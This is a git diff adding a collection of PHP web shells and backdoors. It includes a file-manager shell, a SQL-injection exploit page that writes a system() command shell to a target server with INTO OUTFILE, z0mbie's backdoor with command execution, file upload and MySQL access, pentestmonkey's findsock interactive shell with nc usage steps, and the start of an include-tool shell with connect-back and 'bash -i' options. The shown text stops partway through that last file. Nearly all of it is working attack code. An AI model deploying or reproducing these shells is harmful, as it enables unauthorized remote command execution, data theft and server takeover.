+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- Network security team :: nst.void.ru -->
\ No newline at end of file
diff --git a/php/pHpINJ.php b/php/pHpINJ.php
new file mode 100644
index 0000000..b54acc6
--- /dev/null
+++ b/php/pHpINJ.php
@@ -0,0 +1,37 @@
+<?php
+?>
+<html>
+<head>
+<title>|| .::News Remote PHP Shell Injection::. ||   </title>
+</head>
+<body>
+<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />
+<?php
+if (isset($_POST['url'])) {
+$url = $_POST['url'];
+$path2news = $_POST['path2news'];
+$outfile = $_POST ['outfile'];
+$sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";
+$sql = urlencode($sql);
+$expurl= $url."?id=".$sql ;
+echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
+echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";
+}
+else
+{
+?>
+Url to index.php: <br /> 
+<form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
+<input type = "text" name = "url" value = "http://www.site.com/n13/index.php"; size = "50"> <br />
+Server Path to Shell: <br />
+Full server path to a writable file which will contain the Php Shell <br />
+<input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50"> <br /> <br />
+<input type = "submit" value = "Create Exploit"> <br /> <br />
+
+
+
+<?php
+}
+?>
+</body>
+</html>
\ No newline at end of file
diff --git a/php/php-backdoor.php b/php/php-backdoor.php
new file mode 100644
index 0000000..7defd37
--- /dev/null
+++ b/php/php-backdoor.php
@@ -0,0 +1,71 @@
+<?
+// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
+
+ob_implicit_flush();
+if(isset($_REQUEST['f'])){
+        $filename=$_REQUEST['f'];
+        $file=fopen("$filename","rb");
+        fpassthru($file);
+        die;
+}
+if(isset($_REQUEST['d'])){
+        $d=$_REQUEST['d'];
+        echo "<pre>";
+        if ($handle = opendir("$d")) {
+        echo "<h2>listing of $d</h2>";
+                   while ($dir = readdir($handle)){ 
+                       if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
+							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
+                       echo "$dir\n"; 
+                       echo "</font></a>";
+                }
+                       
+        } else echo "opendir() failed";
+        closedir($handle);
+        die ("<hr>"); 
+}
+if(isset($_REQUEST['c'])){
+	echo "<pre>";
+	system($_REQUEST['c']);		   
+	die;
+}
+if(isset($_REQUEST['upload'])){
+
+		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
+			else $dir=$_REQUEST['dir'];
+		$fname=$HTTP_POST_FILES['file_name']['name'];
+		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
+			die('file uploading error.');
+}
+if(isset($_REQUEST['mquery'])){
+	
+	$host=$_REQUEST['host'];
+	$usr=$_REQUEST['usr'];
+	$passwd=$_REQUEST['passwd'];
+	$db=$_REQUEST['db'];
+	$mquery=$_REQUEST['mquery'];
+	mysql_connect("$host", "$usr", "$passwd") or
+    die("Could not connect: " . mysql_error());
+    mysql_select_db("$db");
+    $result = mysql_query("$mquery");
+	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
+    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
+    mysql_free_result($result);
+	die;
+}
+?>
+<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
+<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
+upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
+<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
+<br>for example:
+http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
+or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
+<hr>execute mysql query:
+<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
+host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
+
+database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
+</form>
+
+<!--	http://michaeldaw.org	2006 	-->
diff --git a/php/php-findsock-shell.php b/php/php-findsock-shell.php
new file mode 100755
index 0000000..3994740
--- /dev/null
+++ b/php/php-findsock-shell.php
@@ -0,0 +1,89 @@
+<?php 
+// php-findsock-shell - A Findsock Shell implementation in PHP + C
+// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
+//
+// This tool may be used for legal purposes only.  Users take full responsibility
+// for any actions performed using this tool.  The author accepts no liability
+// for damage caused by this tool.  If these terms are not acceptable to you, then
+// do not use this tool.
+//
+// In all other respects the GPL version 2 applies:
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License version 2 as
+// published by the Free Software Foundation.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License along
+// with this program; if not, write to the Free Software Foundation, Inc.,
+// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+//
+// You are encouraged to send comments, improvements or suggestions to
+// me at pentestmonkey@pentestmonkey.net
+//
+// Description
+// -----------
+// (Pair of) Web server scripts that find the TCP socket being used by the 
+// client to connect to the web server and attaches a shell to it.  This 
+// provides you, the pentester, with a fully interactive shell even if the 
+// Firewall is performing proper ingress and egress filtering.
+//
+// Proper interactive shells are more useful than web-based shell in some
+// circumstances, e.g:
+//  1: You want to change your user with "su"
+//  2: You want to upgrade your shell using a local exploit
+//  3: You want to log into another system using telnet / ssh
+//
+// Limitations
+// -----------
+// The shell traffic doesn't look much like HTTP, so I guess that you may
+// have problems if the site is being protected by a Layer 7 (Application layer) 
+// Firewall.
+//
+// The shell isn't fully implemented in PHP: you also need to upload a
+// C program.  You need to either:
+//  1: Compile the program for the appropriate OS / architecture then
+//     upload it; or
+//  2: Upload the source and hope there's a C compiler installed.
+//
+// This is a pain, but I couldn't figure out how to implement the findsock
+// mechanism in PHP.  Email me if you manage it.  I'd love to know.
+//
+// Only tested on x86 / amd64 Gentoo Linux.
+//
+// Usage
+// -----
+// See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck.
+//
+// Here are some brief instructions.
+//
+// 1: Compile findsock.c for use on the target web server:
+//    $ gcc -o findsock findsock.c
+//
+//    Bear in mind that the web server might be running a different OS / architecture to you.
+//
+// 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using
+//    whichever upload vulnerability you've indentified.  Both should be uploaded to the 
+//    same directory.
+//
+// 3: Run the shell from a netcat session (NOT a browser - remember this is an
+//    interactive shell).
+//
+//    $ nc -v target 80
+//    target [10.0.0.1] 80 (http) open
+//    GET /php-findsock-shell.php HTTP/1.0
+//
+//    sh-3.2$ id
+//    uid=80(apache) gid=80(apache) groups=80(apache)
+//    sh-3.2$
+//    ... you now have an interactive shell ...
+//
+
+$VERSION = "1.0";
+system( "./findsock " . $_SERVER['REMOTE_ADDR'] . " " . $_SERVER['REMOTE_PORT'] ) 
+?>
+
diff --git a/php/php-include-w-shell.php b/php/php-include-w-shell.php
new file mode 100644
index 0000000..2b4b74a
--- /dev/null
+++ b/php/php-include-w-shell.php
@@ -0,0 +1,1312 @@
+<?php
+######################################################################
+# we decide if we want syslogging
+closelog();
+######################################################################
+# define variables
+######################################################################
+
+# error_reporting(E_ALL);
+error_reporting(0);
+
+# get globals even if register_globals is off
+import_globals();
+
+$safe_mode = ini_get('safe_mode');
+$register_globals = ini_get('register_globals');
+$magic_quotes_gpc = ini_get('magic_quotes_gpc');
+$txt['en']['on']="on";
+$txt['en']['off']="off";
+$txt['de']['on']="an";
+$txt['de']['off']="aus";
+$lang="en";
+
+if($safe_mode == 1) $SM = $txt[$lang]['on'];
+else { 
+	$SM = $txt[$lang]['off'];
+	# set_time_limit(9000);
+}
+if($register_globals == 1) $RG = $txt[$lang]['on'];
+else $RG = $txt[$lang]['off'];
+if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on'];
+else $MQ = $txt[$lang]['off'];
+
+# navigatable functions
+$ArrFuncs = array(
+	"dropinc"	=> 0,
+	"filecopy"	=> 0,
+	"fileedit"	=> 0,
+	"showsource"	=> 0,
+	"snoop"		=> 0,
+	"cmdln"		=> 0,
+	"connectback"	=> 0,
+	"phpshell"	=> 0,
+	"servicecheck"	=> 0,
+	"mysqlaccess"	=> 0,
+	"mail"		=> 0,
+	"env"		=> 0,
+	"phpenv"	=> 0,
+	"phpinfo"	=> 0,
+	"dumpvars"	=> 0,
+	"debugscript"	=> 0,
+	"syslog"	=> 0
+);
+
+# init navigation
+foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;
+
+
+
+# set default values
+$ArrDefaults = array(
+	"filecopy_source" => "http://...",
+	"filecopy_dest" => getcwd(),
+	"cmdcall" => "",
+	"editfile" => getcwd(),
+	"editcontent" => "",
+	"chdir" => ".",
+	"vsource" => $SCRIPT_FILENAME,
+	"mail_from" => "attacker@0wned.org",
+	"mail_to" => "",
+	"mail_subject" => "", 
+	"mail_attach_source"  => "http://....",
+	"mail_attach_appear"  => "filename...",
+	"mail_content_type"   => "image/png",
+	"mail_msg" => "",
+	"tcpports" => "21 22 23 25 80 110",
+	"timeout" => 5,
+	"miniinc_loc" => getcwd() . "/miniinc.php",
+	"incdbhost" => "localhost",
+	"cbhost" => $_SERVER['REMOTE_ADDR'],
+	"cbport" => 20202,
+	"cbtempdir" => "/tmp",
+	"cbcompiler" => "gcc",
+	"phpshellapp" => "export TERM=xterm; bash -i",
+	"phpshellhost" => "0.0.0.0",
+	"phpshellport" => "20202"
+);
+
+# init defaults
+foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;
+
+# define executable functions
+$Mstr = array(
+	0 => "No execute functions available!",
+	1 => "passthru()",
+	2 => "system()",
+	3 => "backticks",
+	4 => "proc_open()",
+	5 => "exec()"
+);
+
+# clean request to avoid uri monster
+$SREQ = "";
+$reqdat = array();
+$tmpCount=0;
+foreach($REQUESTS as $key => $val){
+	if($tmpCount==0) $reqdat[] = $key."=".$val;
+	else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
+	$tmpCount++;
+}
+$SREQ = implode("&", $reqdat);
+$tmpCount=0;
+if($SREQ=="") {
+	$tmp_req = array();
+	$tmp_qry = explode("&", $QUERY_STRING);
+	foreach($tmp_qry as $key => $val) {
+		$tmp_val = explode("=", $val);
+		if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
+		else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
+		$tmpCount++;
+	}
+	$SREQ = implode("&", $tmp_req);
+}
+
+if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot'];
+
+# set some defaults to avaoid errors
+$is_file   = array();
+$is_dir    = array();
+$is_w_dir  = array();
+$is_w_file = array();
+$emeth=0;
+if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
+$chdir = str_replace("//", "/", $chdir);
+if(substr($chdir, -1) != "/") $chdir .= "/";
+##
+# Setup wether to use PHP_SELF or SCRIPT_NAME
+if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
+else $MyLoc = $SCRIPT_NAME;
+
+# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
+$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;
+
+# This is a list of internal inc.inc vars that do not get displayed 
+# inside the dumpvars function (poss for a debug func later?)
+$DebugArr = array(
+	'ARHGFDGFGASDFG',
+	'safe_mode',
+	'register_globals',
+	'magic_quotes_gpc',
+	'txt',
+	'lang',
+	'SM',
+	'RG',
+	'MQ',
+	'ArrFuncs',
+	'val',
+	'key',
+	'env',
+	'phpenv',
+	'phpinfo',
+	'debugscript',
+	'filecopy',
+	'fileedit',
+	'showsource',
+	'snoop',
+	'mail',
+	'cmdln',
+	'syslog',
+	'servicecheck',
+	'dropinc',
+	'mysqlaccess',
+	'ArrDefaults',
+	'filecopy_source',
+	'filecopy_dest',
+	'cmdcall',
+	'editfile',
+	'editcontent',
+	'chdir',
+	'vsource',
+	'mail_from',
+	'mail_to',
+	'mail_subject',
+	'mail_attach_source',
+	'mail_attach_appear',
+	'mail_content_type',
+	'mail_msg',
+	'tcpports',
+	'timeout',
+	'miniinc_loc',
+	'incdbhost',
+	'Mstr',
+	'SREQ',
+	'reqdat',
+	'tmpCount',
+	'is_file',
+	'is_dir',
+	'is_w_dir',
+	'is_w_file',
+	'emeth',
+	'MyLoc',
+	'dumpvarsare',
+	'DebugArr',
+	'cbtempdir',
+	'cbcompiler',
+	'cbhost',
+	'cbport',
+	'phpshelltype',
+	'phpshellapp',
+	'phpshellhost',
+	'phpshellport'
+);
+
+
+# activate syslog entry
+if($syslog == 1)
+{
+#	openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
+#	drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
+}
+###############################################################################
+#
+# start include output 
+#
+###############################################################################
+$strOutput = "";
+$strOutput .= "<html><body bgcolor='#ffffff'>
+<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'>
+<center>
+<h2>Include tool</h2>
+PHP Version: " . phpversion() . " | 
+safe_mode: $SM |
+register_globals: $RG | 
+magic_quotes_gpc: $MQ | 
+syslogging: ";
+if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
+$strOutput .= "
+<br><br>
+</center>
+<font color='#000000'>";
+foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key); 
+
+###############################################################################
+# test cmd shell environment
+###############################################################################
+if($env == 1) { 
+	$strOutput .= "
+	<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr>
+	<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>";
+	if($emeth==0) { 
+		$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>";
+	} else {
+		$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr>
+		<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr>
+		<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr>
+		</table>";
+	}
+}
+
+###############################################################################
+# test php environment
+###############################################################################
+if($phpenv == 1) { 
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr>
+		<tr><td colspan=2>posix infos</td><tr>";
+		if(function_exists('posix_uname')) {
+			$posix_uname = posix_uname();
+			while (list($info, $value) = each ($posix_uname)) {
+				$strOutput .= "<tr><td>$info</td><td>$value</td></tr>";
+			}
+		} else {
+			$strOutput .= "posix_uname not available";
+		}
+		$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>";
+		if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>";
+		else $strOutput .= "posix_getuid not available";
+		if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>";
+		else $strOutput .= "posix_geteuid not available";
+		if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>";
+		else $strOutput .= "posix_getgid not available";
+	$strOutput .= "</table>";
+}
+
+
+###############################################################################
+# dump variables
+###############################################################################
+if($dumpvars == 1) {
+	$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr>
+	<tr><td>" . dd("GLOBALS") . "</td></tr>
+	</table>";
+}
+###############################################################################
+# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
+###############################################################################
+if($debugscript == 1) { ?>
+	<table border=1><tr><td><h3>debug script</h3></td></tr>
+	<tr><td>
+	<? ddb("DebugArr"); ?>
+	</td></tr>
+	</table>
+<? }
+###############################################################################
+# copy file
+###############################################################################
+if($filecopy == 1) { 
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>
+	<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>
+	<tr><td>destination</td><td><input type=text name='filecopy_dest'  value='" . $filecopy_dest . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr>
+	</form>
+	</table>";
+} 
+###############################################################################
+# edit file
+###############################################################################
+if($fileedit == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>
